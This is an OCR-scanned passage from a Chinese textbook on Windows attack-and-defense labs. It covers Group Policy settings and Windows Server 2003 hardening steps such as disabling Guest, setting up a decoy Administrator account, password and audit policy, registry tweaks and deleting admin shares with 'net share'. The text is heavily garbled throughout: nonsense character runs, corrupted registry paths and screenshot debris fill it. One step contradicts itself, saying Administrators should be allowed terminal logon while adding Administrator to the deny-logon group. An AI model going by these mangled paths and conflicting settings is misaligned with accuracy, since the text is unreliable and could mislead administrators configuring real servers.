(D REG. BINARY. REG. BINARY 为 未 处 理 的 二 进 制 数据 。 多 数 硬 件 组 件 信 息 都 
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是 以 二 进 制 存储 的 ,但 以 十 六 进 制 格 式 显示 在 注册 表 编 辑 器 中 。 

(2) REG_WORD。 数 据 由 4 字 节 长 的 数 表 示 。 许 多 设备 驱动 程序 和 服务 的 参数 使 用 
这 种 类 型 ,并 在 注册 表 编 辑 器 中 以 二 进 制 . 十 六 进 制 或 十 进 制 的 格式 显示 。 

(3) REG EXPAND SZ, REG EXPAND SZ 为 长 度 可 变 的 数据 串 。 该 数据 类 型 包含 
在 程序 或 服务 使 用 该 数据 时 确定 的 变量 。 

(4) REG MULTI SZ, REG MULTI SZ 为 多 重 字 符 串 。 其 中 包含 格式 可 被 用 户 读 
取 的 列表 项 ,用 空格 .逗号 或 其 他 标记 分 开 。 

(5) REG. SZ, REG SZ 为 固定 长 度 的 文本 串 。 


2.5 ”针对 组 案 略 的 攻防 


组 策略 (Group Policy) 是 配置 Windows 的 一 种 有 效 工 具 。 虽 然 组 策略 编辑 关中 的 大 部 
分 配置 都 可 以 通过 直接 修改 注册 表 实 现 ,但 是 通过 组 策略 编辑 需 比 通过 注册 表 进 行 修 改 更 
加 直观 , 且 不 容易 出 错 。 


2.5.1. 预备 知识 : 了 解 组 策略 


作为 Windows 操作 系统 中 一 个 能 够 让 系统 管理 员 充 分 管理 用 户 工 作 环境 的 工具 ,通过 
组 策略 可 以 为 用 户 设 置 不 同 的 工作 环境 。 组 策略 包含 “计算 机 配置 "和 “用 户 配置 ”两 部 分 ， 
分 别 对 计算 机 和 用 户 的 相关 配置 环境 产生 影响 ,运行 “gpedit. msc" ip 4 n] LA FT FF 2B 5& Wi Zi 
辑 硕 。 组 策略 有 以 下 两 种 配置 方式 。 
(1) 本 地 计算 机 策略 。 本 地 计算 机 策略 可 以 用 来 设置 单一 计算 机 的 策略 ,在 这 个 策略 
内 的 计算 机 配置 只 会 被 应 用 到 这 台 计 算 机 ,而 用 户 设 置 会 被 应 用 到 在 此 计算 机 登录 的 所 有 
HF. 
(2) 域 的 组 策略 。 域 的 组 策略 在 域内 可 以 针对 站 点 ` 域 或 组 织 单位 来 设置 组 策略 。 其 
中 , 域 组 策略 内 的 设置 会 被 应 用 到 域内 的 所 有 计算 机 与 用 户 , 而 组 织 单 位 的 组 策略 会 被 应 用 
于 该 组 织 单 位 内 的 所 有 计算 机 与 用 户 。 


2.5.2 实验 目的 和 条 件 


1. 实验 目的 

ERREI Windows 操作 系统 组 策略 功能 和 管理 方式 的 基础 上 ,结合 前 面 有 关注 册 表 
的 实验 内 容 , 进一步 学 习 组 策略 的 安全 设置 方法 。 根据 网 络 攻 防 实际 ,本 实验 针对 
Windows Server Jlk 5 28 8E 2 Bc P HJ 2B RW ETI^K JI. TESÉ T A KIRS s UIS TRE R 
统 的 组 策略 配置 与 管理 方法 后 ,读者 可 参考 相关 操作 指南 学 习 针 对 Windows XP Sr 5g M fà 
作 系 统 组 策略 的 管理 方法 。 

2. 实验 清单 及 软 硬 件 要 求 


根据 目前 应 用 实际 ,本 实验 中 选择 Windows Server 2008 R2 标准 版 的 服务 需 操 作 系统 
作为 实验 平台 
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2.5.3 实验 过 程 


1. 取消 关机 前 的 提示 信息 


当 对 Windows Server 2008 R2( 包 括 其 他 版 本 的 Windows Server 操作 系统 ) 计 算 机 进 
行 关机 操作 时 ,系统 会 要 求 提 供 关 机 的 理由 (因为 服务 需 一 般 是 不 会 关机 的 ) ,如 图 2-22 所 
示 。 此 提示 带 来 日 常 操 作 中 的 不 便 , 对 于 经 常 需 要 远程 管理 的 Windows Server 服务 需 来 
说 ,可 以 通过 组 策略 的 配置 , 当 需 要 进行 关机 时 不 再 出 现 图 2-22 中 的 提示 信息 ,而 是 直接 
XP. 


B]2-22 ”选择 关机 时 理由 


步骤 1: 选择 “开始 "一 “运行 ?选项 ,在 打开 的 "运行 ?操作 框 中 输入 “gpedit. msc ”命令 ， 
如 图 2-23 所 示 。 


gpedit.msc - 


Low | om | mo | 


2-03 输入 “gpedit. msc" áp 4 


步骤 2. "RabUSÉ EU TE HUR.ETIJEHJ H ZH AE Zu HERR a IP TRU YE PE TT 3L RC 
B" BE": 3c .TE43 0051] 3 TE "P xe BU TEOGE OK IS] AI dh zs "管理 您 的 服务 大 ” 
页 ”选项 ,如 图 2-24 所 示 。 

步骤 3: 在 打开 的 如 图 2-25 所 示 的 对 话 框 中 ,选中 “已 禁用 ” 单 选 按钮 ,并 单 击 “确定 ” 
按钮 。 

通过 以 上 设置 ,以 后 要 关机 或 重新 启动 计算 机 时 ,系统 都 不 会 再 出 现 类 似 图 2-22 所 示 
的 对 话 框 。 


$23 Windows 操作 系统 攻防 实 训 


B 本 地 组 策略 编辑 眉 


E RR 


在 登录 时 不 显示 “管理 您 的 服务 
arn O 用 户 配置 文件 
回 远程 过 程 调用 


编辑 第 中 设置 总 远程 协助 
zy — 顽强 存储 访问 

23 indows Server d 
dium 下 载 缺少 的 con 组 件 


eg ee DNE 
， 可 以 关闭 “ 不 要 自动 加 : 

MRS” 页 的 自动 显示 功能 。 E| Windows 系统 关闭 发 生 后 不 关闭 系统 电源 。 
如 果 启 用 此 策略 设置 ， 风 | 每 次 管理 员 E. E BARR ERTE 


SRAL SATSET “ER 
您 的 服务 器 ”页 。 


如 果林 用 或 不 配置 此 第 略 设 置 ， 风 每 
ER UT 


田 7j Windows 设置 
G 管理 模板 


OO OO OO AAAA] TOUT 


: Hh 
i65. inm E AREEN “di NB)" MERDAN 
管理 员 已 选择 位 于 “管理 您 的 服务 加 限制 这 些 程序 从 帮助 启动 
器 ”页 底部 的 “在 登录 时 不 要 显示 此 量 p 余 启动 /关机 /登录 注销 状态 消息 
页 ”选项 ， 将 不 显示 此 页 。 c 详细 与 正常 状态 消息 
(iz) 3ÉGE Windows Service Pack 安装 文件 位 置 
[E] 指定 Windows 安装 文件 位 置 


关机 时 显示 的 一 组 额外 的 问题 ， 用 于 收集 与 关机 原因 有 关 的 信息 。 


如 果 启 用 此 误 置 并 从 下 拉 荣 单 中 选择 “始终 显示 ” ， 则 在 关机 时 会 
显示 关闭 事件 跟踪 程序 。 


如 果 启 用 此 误 置 并 从 下 拉 荣 单 中 选择 RESE X 则 当 关闭 以 

Windows Server 2003 开始 的 Windows Server 计算 机 时 ,会 

显示 关闭 事件 跟踪 程序 ”，。 

如 果 启 用 此 误 置 并 从 下 拉 荣 单 中 选择 “ 仅 工 作 站 ”， 则 当 关 闭 以 

Windows XP Professional 开始 的 Windows 工作 站 时 ， 会 显示 
"关闭 事件 跟 跨 程序” 。 

如 果 禁 用 此 识 置 , 则 在 关机 时 不 显示 关闭 事件 跟踪 程序 。 


如 果 厅 析 早 此 设置 | 将 出 现 关闭 事件 跟踪 程序 的 默认 行为 。 


注意 : 默认 情况 下 ， " 兴 闭 事件 跟踪 程序 。 只 显示 在 Windows n 


2-25 选中 “已 禁用 ” 单 选 按钮 
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2. 阻止 用 户 从 “开始 "菜单 执行 “关机 ”重新 启动 ”等 命令 


由 于 服务 器 应 用 的 重要 性 ,不 管 是 本 地 操作 还 是 远程 控制 ,一 般 很 少 要 求 系统 进行 关 
机 、 重 新 启动 、 睡 虐 、 休 虐 等 操作 。 尤 其 在 攻击 者 入 侵 系统 后 ,更 不 允许 使 用 这 些 功能 。 通 过 
本 实验 ,将 会 取消 Windows Server 2008 操作 系统 “开始 ”菜单 或 “Windows 安全 ”执行 中 的 
关机 、 重 新 启动 睡眠 、 休 眠 等 功能 项 。 

步骤 1: 依次 选择 “本 地 计算 机 策略 ”~ 用 户 配置 ”管理 模板 ”一 “开始 ?菜单 和 任务 
栏 ” 选 项 ,在 右 侧 列表 中 选取 “删除 并 阻止 访问 “关机 ”重新 启动 '“ 睡 虐 ”和 “休眠 ” ”命令 , 如 


图 2-26 所 示 。 
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步骤 2: 在 打开 的 如 图 2-27 所 示 对 话 框 中 ,选中 “已 启用 ” 单 选 按钮 ,此 设置 会 
到 所 有 用 户 。 
之 后 就 会 发 现 ,“ 关 机 ”“ 重 新 启动 “睡眠 ”和 “休眠 ”命令 将 从 “开始 ”菜单 中 被 删除 ,电源 
按钮 也 会 从 “Windows 安全 ”中 删除 ,提高 了 系统 应 用 的 安全 性 。 
3. 禁用 浏览 器 上 的 “连接 ”和 “安全 ”选项 卡 
过 浏览 硕 属 性 中 的 "连接 ”和 ”安全 ?选项 卡 , 如 图 2-28 所 示 , 可 以 对 用 户 浏览 需 的 安 


立即 应 用 


me 了 设置 ,如 禁止 访问 某 些 网 站 .局 用 安全 保护 .设置 连接 代理 等 。 出 于 安全 ,可 以 禁止 
用 户 使 用 此 功能 。 
步骤 1: 依次 选择 “本 地 计算 机 策略 ”一 “用 户 配 置 * 一 “管理 模板 ”一 “Windows tB fF" 


Internet Explorer" Internet 控制 面板 ”选项 ,在 右 侧 的 列表 框 中 可 分 别 选 取 “ 禁 用 连接 页 ” 
和 “禁用 安全 页 ”选项 ,如 图 2-29 所 示 。 
步骤 2: 在 出 现 的 类 似 如 图 2-30 所 示 的 对 话 框 中 ,选中 “已 启用 ” 单 选 按钮 ,此 设置 会 立 
RS HP. 
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2-29 ”对 Internet 控制 面板 进行 设置 


因为 此 第 咯 会 山 除 界面 上 的 “ 连 按 ” 选 项 卡 ， 所 以 如 果 设置 此 第 咯 | 
, 则 无 须 识 置 以 下 与 “连接 ”选项 卡 有 关 的 第 咯 ; | 
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2-30 选取 “已 启用 ” 单 选 按钮 
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步骤 3: 选择 Internet Explorer 中 的 “Internet 选项 ”选项 ,打开 如 图 2-31 所 示 的 对 话 
框 ,将 其 与 图 2-28 进行 比较 。 读 者 会 发 现 :“Internet 选项 ”对 话 框 中 已 经 不 再 显示 “安全 ” 
和 “连接 ”选项 卡 。 


2-31 不 再 显示 “安全 ”和 “连接 ”选项 卡 


4. 隐藏 “Windows 防火 墙 ” 


防火 墙 是 网 络 安全 中 应 用 最 广泛 的 一 类 工具 , Windows 防火 墙 属于 个 人 防火 墙 ,是 
Windows 操作 系统 自身 集成 的 防火 墙 。 启 用 了 防火 墙 后 ,会 给 用 户 的 部 分 操作 带 来 不 便 ， 
所 以 用 户 经 常会 关闭 防火 墙 。 为 了 防止 用 户 因 关闭 “Windows 防火 墙 ” 而 带 来 安全 问题 ,可 
以 将 “Windows 防火 墙 ? 隐 藏 起 来 。 

步骤 1: 依次 选择 "本 地 计算 机 策略 ”一 用户 配置 ”一 "管理 模板 ”控制 面板 ”选项 ,在 
右 侧 列表 框 中 选择 “隐藏 指定 的 “控制 面板 ”项 ”选项 ,如 图 2-32 所 示 。 

步骤 2: 在 打开 的 对 话 框 中 首先 选中 "已 启动 ? 单 选 按钮 ,然后 再 单 击 “ 显 示 ”一 ”添加 ” 按 
钮 ,在 “显示 内 容 ” 对 话 框 中 输入 *Windows 防火 墙 ”( 注 意 Windows 与 防火 墙 之 间 有 一 个 空 
格 ) ,如 图 2-33 所 示 。 依 次 单 击 “ 确 定 ” 按 钮 ,此 设置 会 立即 应 用 到 所 有 用 户 。 

之 后 ,用 户 青 选择 “开始 ”>“ 控 制 面板 ”>“ 系 统 和 安全 ”选项 ,在 打开 的 如 图 2-34 所 示 
的 对 话 框 中 ,可 以 看 到 “Windows 防火 墙 " 已 经 被 隐藏 。 


2.5.4 任务 与 思考 


组 策略 涉及 的 内 容 非常 广泛 ,本 实验 仅 选 择 了 几 个 典型 的 应 用 ,目的 是 让 读者 掌握 组 策 
略 的 应 用 功能 和 配置 方法 。 在 此 基础 上 ,读者 可 以 结合 攻防 实际 ,针对 不 同 的 组 策略 管理 要 
求 ,通过 自己 设计 不 同 的 应 用 环境 进行 实验 测试 ,提高 针对 Windows 组 策略 的 攻防 能 力 。 

在 单机 运行 环境 下 ,通过 组 策略 可 以 进行 很 多 配置 ,如 限制 可 执行 文件 的 运行 、 限 制 
.appx 程序 的 执行 设置 密码 策略 等 ,如 图 2-35 所 示 。 
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中 可 此 /找到 控制 面板 项 的 规范 名 称 和 模块 宫 称 的 完整 列表 。 
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2-35 设置 “密码 策略 ” 


而 在 Windows Server 活动 目录 域 环境 中 ,组 策略 的 功能 更 加 强大 ,主要 包括 以 下 几 
方面 。 

(1) 通过 组 策略 管理 用 户 工 作 环境 。 系 统管 理 员 通过 对 组 策略 的 配置 ,可 以 根据 管理 
需要 设置 用 户 的 操作 环境 ,加 强 对 用 户 操 作 的 控制 ,以 提高 系统 的 安全 性 。 例 如 ,通过 组 条 
略 的 配置 ,可 以 限制 用 户 只 能 在 限定 的 时 间 范 围 内 浏览 Internet, 限制 用 户 修 改 客户 端的 本 
置 等 。 

(2) 利用 组 策略 部 署 软件 。 系 统管 理 员 可 以 通过 组 策略 将 软件 部 署 给 域 用 户 或 计算 
机 ,这样 , 当 域 用 户 登 录 或 成 员 计 算 机 局 动 时 将 目 动 安装 被 部 署 的 软件 。 为 了 适应 不 同 的 用 
户 需要 ,组 策略 的 软件 部 署 功 能 还 提供 了 分 配 (assign) 与 发 布 (publish) 两 种 方式 。 

(D 分 配 。 当 管理 员 将 一 个 软件 通过 组 策略 分 配给 域 成 员 计 算 机 后 ,这 些 计算 机 局 动 时 
就 会 目 动 安 痛 这 个 软件 ,而 且 任 何 用 户 登 录 都 可 以 使 用 此 软件 。 用 户 登 录 后 ,就 可 以 通过 町 
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面 或 “开始 ”菜单 局 用 此 软件 。 

G 发 布 。 当 管理 员 将 一 个 软件 通过 组 策略 发 布 给 域 用 户 后 , 它 并 不 会 目 动 被 安装 到 用 
户 的 计算 机 中 ,用 户 可 以 通过 "控制 面板 ?安装 此 软件 。 

(3) 限制 软件 的 运行 。Windows Server 域 环 境 提供 了 功能 非常 丰富 和 强大 的 软件 管 
理 功能 ,通过 软件 限制 策略 所 提供 的 多 种 规则 ,可 以 限制 或 允许 用 户 运 行 的 程序 。 

读者 可 以 在 本 实验 操作 的 基础 上 ,结合 具体 应 用 ,通过 配置 组 策略 提升 应 用 的 安全 性 。 


2.6 Windows Server 的 安全 配置 


2.6.1 预备 知识 : Windows Server 的 网 络 功能 


从 Windows NT Server 4. 0 开始 ,Windows 服务 器 操作 系统 开始 在 国内 得 到 大 量 应 
用 。 虽 然 微 软 公 司 宣布 基于 Windows Server 2016 开发 的 Windows Server 2019 将 于 2018 
年 下 半年 正式 发 布 , 但 在 众多 Windows Server 版 本 中 ,Windows Server 2003 最 受用 户 青 
睐 ,主要 有 以 下 两 个 原因 。 

1. Windows Server 支持 的 网 络 环境 

Windows Server 文 持 不 同 的 网 络 技术 和 服务 ,可 以 让 技术 人 员 根 据 需 要 组 建 各 种 不 同 
规模 和 应 用 功能 的 网 络 。 由 Windows Server 组 建 的 网 络 , 主 要 分 为 以 下 3 种 类 型 。 

CD 企业 内 部 网 络 。 企 业内 部 网 络 (Intranet) 一 般 是 指 单 位 内 部 的 本 地 局 域 网 (Local 
Area Network ,LAN)。 通 过 单位 内 部 的 LAN, 用 户 可 以 将 文件 .打印 机 等 资源 共享 给 其 他 
网 络 用 户 访 问 。 巾 于 Internet 的 造 勃 发 展 , 一 般 单位 内 部 网 络 会 组 建成 各 种 与 Internet 相 
关 的 应 用 和 服务 ,如 内 部 Web 网 站 内 部 电子 邮件 系统 等 。 

(2) 因特网 。 因 特 网 (Internet) 是 连接 全 球 的 最 大 范围 的 互联 网 ,通过 Internet 可 以 让 
单位 内 部 网 络 与 世界 范围 内 提供 Internet 服务 的 网 络 互 联 。 用 户 可 以 通过 Web 20 W ar Uj 
问 资 源 , 通 过 电子 邮件 传递 信息 等 。 

(3) 企业 外 部 网 络 。 企 业 外 部 网 络 (Extranet) 是 指 根据 单位 的 需要 ,通过 Internet 将 与 
本 单位 有 着 密切 合作 关系 的 其 他 单位 的 网 络 ( 一 般 为 LAN) 连 接 起 来 ,从 而 形成 一 个 在 联系 
上 相对 紧密 的 网 络 ,以 便 相 互 间 共享 资源 。 

2. Windows Server 提供 的 网 络 技 术 和 服务 

Windows Server 主要 提供 了 以 下 的 网 络 技术 和 服务 。 

(1) 同时 支持 IPv4 和 IPv6。 

(2) x ft DHCP、DNS、WINS 等 服务 ,可 分 别 组 建 DHCP、DNS 和 WINS 服务 大 。 

(3) 提供 PKICPublic Key Infrastructure. 公共 密 钥 基础 设施 ) 与 IPSec (Internet 
Protocol Security, Internet 协议 安全 ) 。 

(D 路 由 及 远程 访问 .RADIUS 服务 器 、Direct Access 与 网 络 访问 保护 (NAP) 。 

(5) K HH 28, NAT (Network Address Translate. 网 络 地 址 转换 ) 与 VPN (Virtual 
Private Networks, E MEHA). 

(6) QoS(Quality of Service ,服务 质量 ) 。 
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(7) Windows 防火 墙 \IEEE 802. 1X 无 线 网 络 , rc fé si nii, Windows 部 署 服 务 。 
(8) IIS 网 站 、SSL 网 站 、FTP IRZ SSL FTP IRS 25. 

(9) Windows Server Update Services( WSUS), 

(10) 网 络 负 载 均衡 (Network Load Balancing) Ej Web Farm, 


2.6.2 实验 目的 和 条 件 


1. 实验 目的 


通过 本 实验 ,使 读者 在 熟悉 Windows 操作 系统 安全 架构 的 基础 上 ,针对 Windows 
Server 操作 系统 的 配置 ,掌握 Windows 服务 颖 的 安全 配置 方法 ， 


2. 实验 条 件 


在 本 实验 中 ,用 一 台 运 行 Windows Server 2003 的 计算 机 作为 服务 赴 ,在 该 服务 央 上 进 
行 相关 安全 策略 的 配置 。 同 时 ,最 好 还 有 一 台 运 行 Windows XP 及 以 上 版 本 操作 系统 的 客 
户 问 计算 机 ,用 于 实验 的 测试 。 


2.6.3 实验 过 程 


步骤 1. 以 账号 Administrator 身份 登录 Windows Server 2003 操作 系统 。 

步骤 2i 给 Guest 账户 设置 复杂 的 密码 并 禁用 。 选 中 “我 的 电脑 ”并 右 击 ,在 出 现 的 快捷 
菜单 中 选择 “属性 ”选项 ,在 打开 的 对 话 框 中 选择 “管理 ”选项 。 然 后 依次 选择 “计算 机 管理 
(本 地 ) ”一 "系统 工具 ?一 “本 地 用 户 和 组 ?一 “用户 ?选项 ,在 打开 对 话 框 的 右 侧 列表 中 选中 
Guest 账号 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “设置 密码 ”选项 ,如 图 2-36 所 示 。 
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为 了 保险 起 见 , 最 好 给 Guest 设置 一 个 复杂 的 密码 。 读 者 可 以 打开 记事 本 ,在 里 面 输入 
一 串 包 含 特殊 字符 .数字 .字母 的 长 字符 串 , 然 后 把 它 作 为 Guest 用 户 的 密码 复制 进去 ,如 
图 2-37 所 示 。 给 Guest 设置 了 一 个 复杂 的 密码 后 单 击 “确定 ”按钮 ,系统 提示 密码 设置 
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成 功 。 

步骤 3: 禁用 Guest 账户 。 选 中 Guest 账户 后 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ” 选 
项 ,在 打开 的 如 图 2-38 所 示 的 对 话 框 中 同时 选中 “用 户 不 能 更 改 密码 “密码 永 不 过 期 ”和 
“账户 已 禁用 ” 复 选 框 。 
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2-37 输入 新 密码 2-38 禁用 Guest 账户 的 设置 


此 时 可 以 看 到 Guest 账户 已 经 被 禁用 ,如 图 2-39 所 示 。 
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2-39 显示 Guest 账户 已 经 禁用 


步骤 4: 将 系统 Administrator 账号 重 命名 。Windows Server 2003 的 Administrator 用 
户 是 不 能 被 停 用 的 ,这 意味 着 攻击 者 可 以 一 遍 一 过 地 尝试 这 个 用 户 的 密码 。 出 于 安全 考虑 ， 
尽量 把 该 账户 伪装 成 普通 用 户 ,如 重 命名 为 DCST。 具 体 方 法 为 : 选中 Administrator 账户 
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并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “ 重 命名 ”选项 ,用 DCST 代替 Administrator 即 可 。 此 时 
Administrator 超级 管理 员 已 经 重 命 名 为 DCST, 如 图 2-40 所 示 。 
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2-40 将 Administrator 重 命名 为 DCST 


步骤 5: 创建 一 个 陷阱 用 户 。 所 谓 陷 阱 用 户 ,就 是 创建 一 个 名 称 为 Administrator 的 本 
地 用 户 ,把 该 用 户 账户 的 权限 设置 成 最 低 , 并 设置 一 个 非常 复杂 的 密码 。 这 样 就 可 以 使 攻击 
者 即使 耗费 再 长 的 时 间 ,也 很 难 获 得 真正 的 管理 员 账 户 和 密码 ,而 且 通 过 这 种 方法 ,可 以 发 
现 攻击 者 的 入 侵 企 图 。 具 体 方法 为 : 在 “用 户 ? 列 表 的 空白 处 右 击 ,在 出 现 的 快捷 菜单 中 选 
择 “ 新 用 户 ” 选 项 ,在 “新 用 户 ” 对 话 框 中 新 建 一 个 名 称 为 Administrator 的 用 户 , 并 给 
Administrator 设置 一 个 非常 复杂 的 密码 ,然后 单 击 “ 创 建 ” 按 钮 即 可 ,如 图 2-41 所 示 。 
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2-41 新 建 一 个 名 称 为 Administrator 的 普通 账户 并 设置 复杂 的 密码 


需要 说 明 的 是 ,为 了 防止 账户 的 重 名 ,在 创建 以 Administrator 用 户 名 称 为 陷阱 用 户 之 
前 ,需要 对 原来 系统 中 默认 创建 的 Administrator 管理 员 账 户 进 行 重 命名 操作 。 
此 时 在 用 户 列 表 中 可 以 看 到 新 建 的 普通 用 户 Administrator, 如 图 2-42 所 示 。 
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2-42. 显示 新 创建 的 普通 账户 Administrator 


然后 在 新 建 的 Administrator IK EA ih ,在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,在 打 
开 的 如 图 2-43 所 示 的 对 话 框 中 ,可 看 到 此 用 户 隶 属于 Users 普通 用 户 权 限 。 


2-43 ”显示 Administrator 隶属 于 Users 普通 用 户 权 限 


步骤 6: 密码 安全 设置 。 一 些 公 司 的 管理 员 创 建 账号 时 往往 用 公司 名 、 计 算 机 名 作为 用 
户 名 ,然后 又 把 这 些 用 户 的 密码 设置 的 非常 简单 ,如 “welcome”123456” 等 。 为 了 加 强 对 用 
户 账户 的 安全 管理 ,不 仅 需要 注意 密码 的 复杂 性 ,还 需要 经 常 更 换 密 码 。 

首先 选择 "开始 ”一 “管理 工具 ”一 "本 地 安全 设置 ?选项 ,进入 “本 地 安全 策略 ?设置 窗口 。 
然后 选择 "账户 策略 ”一 密码 策略 ?选项 ,在 打开 的 如 图 2-44 所 示 的 窗口 中 进行 密码 策略 设 
置 。 其 中 ,系统 默认 禁用 了 “密码 必须 符合 复杂 性 要 求 ” 功 能 ,市 来 了 安全 隐患 。 
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2-44 密码 策略 设置 


选择 “密码 必须 符合 复杂 性 要 求 ” 选 项 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,在 
打开 的 如 图 2-45 所 示 的 对 话 框 中 选中 “已 启用 ” 单 选 按钮 即 可 。 


图 2-45 启用 密码 必须 符合 复杂 性 要 求 功 能 


同时 ,密码 长 度 最 小 值 ? 系 统 默 认为 0 个 字符 , 即 没 有 进行 限制 ,这 是 很 不 安全 的 。 可 
在 选取 该 项 后 右 击 , 在 出 现 的 快捷 沫 单 中 选择 "属性 ?选项 ,在 出 现 的 如 图 2-46 所 示 的 对 话 
框 中 根据 需要 选择 合适 的 密码 字符 个 数 , 如 设置 为 "10? 个 字符 。 密 码 字 符 个 数 越 多 ,攻击 者 
进行 暴力 破解 的 难度 也 就 越 大 。 

步骤 7: 开局 系统 审核 功能 。 每 当 用 户 执行 了 指定 的 某 些 操作 ,审核 日 志 就 会 记录 一 个 
审核 项 。 管 理 员 可 以 审核 操作 中 的 成 功 答 试 和 失败 和 莹 试 。 安 全 审核 对 于 服务 套 操 作 系统 来 
说 极其 重要 ,因为 通过 审核 日 志 可 以 发 现 系统 中 发 生 了 哪些 违反 安全 的 事件 。 如 果 网 络 中 
发 生 了 针对 操作 系统 的 入 侵 行为 ,正确 的 审核 设置 所 生成 的 审核 日 志 将 包含 有 关 此 次 入 侵 
的 重要 信息 。 
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2-46 设置 密码 长 度 值 


选择 “本 地 策略 ?一 ”审核 策略 ?选项 ,在 右 侧 列 表 中 可 以 根据 安全 管理 需要 对 重要 事项 
进行 审核 ,如 图 2-47 所 示 ,建议 将 所 有 事件 都 设置 为 进行 成功” 审核 。 


i 本 地 安全 设置 


&- C] 软件 限制 策略 
EE RECIENTE EI 


2-47 对 重要 事项 进行 审核 


步骤 8: 用 户 权 限 分 配 。 选 择 “ 本 地 策略 ”一 “用 户 权 限 分 配 ” 选 项 ,在 右 侧 列表 中 选择 “ 通 
过 终端 服务 需 拒 绝 登 录 ? 选 项 ,如 图 2-48 所 示 , 删 除 系统 默认 的 设置 ,只 添加 Administrators 
组 ,使 该 组 中 的 用 户 账户 能 够 利用 终端 服务 硕 登 录 。 
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TFX 安全 设置 
还 在 文件 和 目录 Adninistrators, Backup Operators 
$3166 t: H8 3C SUPPORT 300945a0, ASPNET 
ex) fes Fütausidia & ERE SVPPOKT 38994540 
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Mninistrators,Power Users 


Adainistrators 

Administrators 
#5-1-5-21-39793931-371174170- . . 
LOCAL SERVICE, KETYORK SERVICE 


LOCAL SERVICE, NETWORK SERVICE... 
Everyone, Adainistrators, Users... 


Adainistrators, Renote Desktop... 


AMdninistrators 


1*$-1-5-21-39793831-371174170-. .. 
AMdninistrators 
AMdainistrators 
Adainistrators 
WETYORK SERVICE, ASPHET 
LOCAL SERVICE, SUPPORT, 3889454. . . 


图 2-48 选择 “通过 终端 服务 器 拒绝 登录 ”选项 

选择 “通过 终端 服务 拒绝 登录 ”选项 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ?选项 ,打开 
“通过 终端 服务 拒绝 登录 属性 ”对 话 框 ,如 图 2-49 所 示 。 

选择 ASPNET 选项 , 单 击 “删除 ”按钮 ,将 ASPNET 组 从 通过 终端 服务 拒绝 登录 的 组 

中 删除 。 然 后 单 击 “ 添 加 用 户 或 组 ”按钮 ,打开 “选择 用 户 或 组 ”对 话 杠 ,如 图 2-50 所 示 。 


E174 PT.) 3:1.: 


2-49 “通过 终端 服务 拒绝 登录 属性 ”对 话 框 2-50 “选择 用 户 或 组 ”对 话 框 


单 击 “高 级 ”按钮 ,在 出 现 的 对 话 框 中 单 击 “立即 查找 ?按钮 ,在 “搜索 结果 ?列表 框 中 将 显 
示 所 有 的 用 户 和 组 ,如 图 2-51 所 示 。 

双击 Administrator, 即 将 该 组 添加 到 通过 终端 服务 拒绝 登录 的 组 中 ,如 图 2-52 所 示 。 

单 击 “ 确 定 ” 按 钮 ,此 时 显示 Administrator 已 经 加 入 该 组 ,如 图 2-53 所 示 。 


66 网 络 攻 未 与 防御 实 训 


VM-3TZRGYGZ. .. 


Adminisirators, Backup Operators 
SUPPORT 38894540, ASPHET 
SUPPORT 38894540 


Adeinistrators, Power Users 
Adeinistrators 

Adeinizirators 
1»$-1-5-21-39193931-7371174110-21404110. . . 
Everyone, Adninistrators, Users, Power V... 
Adninistrators, Remote Desktop Users 


Adeinisztrators 


1$-1-5-21-39193931-371174110-21404110. . . 


- I 外 本 地 安全 设置 | | n Ea 


2-53 Administrator 已 经 加 入 “通过 终端 服务 拒绝 登录 ”组 中 
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步骤 9: 修改 注册 表 ,防止 ICMP 重 定 回报 文 的 攻击 。 选 择 *“ 开 始 ” 一 “运行 ?选项 ,随后 
输入 “regedit” 命 令 ,在 打开 的 "注册 表 编 辑 需 ?对话 框 中 定位 到 HKEY LOCAL MACHINES 
SYSTEM\CurrentControlSet\Tcpip\Parameters, 如 图 2-54 所 示 。 


LIES M BÉ | EUN 
| ab) diti) C-E iis g] 
| taBazePath XSystenRootASysten32V. 
adcEDetectDefault 0x00000001 (1) 
n router 
hepNaneServer 192. 188. 0.1 


BEERE 


ain 
ntAddiefaultGatewayDefault 
inableSecuri tyFilters 
ForwardBroadcests 

os iname 

»ableRouter 

xUserPort 

Server 


dade. J àa F ad de 


Myg] 


PLA 


PODRE 


Hostnane 
zervedPorts 
archList 
|] £)suri etTie e Fai tSeqC back 
| 8EITepTinedfai tDelay 


| 2x eDonai nf aneD evolution 


2-54 “注册 表 编 辑 器 对话 框 


选择 EnableICMPRedirects 选项 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “修改 ”选项 ,在 打开 
的 “编辑 DWORD 值 ” 对 话 框 中 选中 “十 六 进 制 ” 单 选 按 钮 ,并 将 “数值 数据 ”设置 为 “0”, 然 后 
单 击 “ 确 定 ” 按 钮 ,如 图 2-55 所 示 。 

步骤 10: 修改 注册 表 , 禁 止 IPC 空 连接 。 攻 击 者 可 以 利用 net use 命令 建立 空 连接 , 进 
而 实施 入 侵 , 还 有 net view,.nbtstat 等 工具 也 是 基于 空 连接 的 。 因 此 ,IPC 空 连接 存在 很 大 
的 安全 问题 ,一 般 需 要 禁止 。 首 先 在 “注册 表 编 辑 硕 ”中 定位 到 Local_Machine\System\ 
CurrentControlSetNVControlNLSA 下 的 restrictanonymous 选项 ,将 该 项 的 十 六 进 制 数值 改 
成 “1” 即 可 ,如 图 2-56 所 示 。 


TR DFORD {Å 2 由 得 DFORD {Å 


2-55 “编辑 DWORD 值 ? 对 话 框 2-56 “将 restrictanonymous 的 十 六 进 制 数值 改 成 1 


步骤 11: 删除 服务 右 共 享 。 服务 副 共 享 虽然 提供 了 资源 共享 时 的 便利 ,但 却 市 来 了 安 
全 威胁 ,对 于 服务 器 来 说 ,出 于 安全 考虑 ,应 该 将 其 删除 。 可 以 在 "命令 提示 符 "下 分 别 运行 
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以 下 命令 来 完成 ,如 图 2-57 所 示 。 


net share c$ /del 
net share d$ /del 
net share admin $ /del 


不 愈 令 提示 符 E 
Microsoft Windows [版 本 5.2.3790] 
《C》 有 版 权 了 所 有 1985-2003 Microsoft Corp. 


C:\Documents and SettingsNnhdministkatok>net share c$ /del 


c$ 已 经 删除 。 
X 


C:\Documents and Settings Midministrator»net share d$ /del 


a$ 己 经 删除 。 


C:\Documents and Settings Mldministrator?5net share admin /del 


C:\Documents and Settings Administrator?» m 


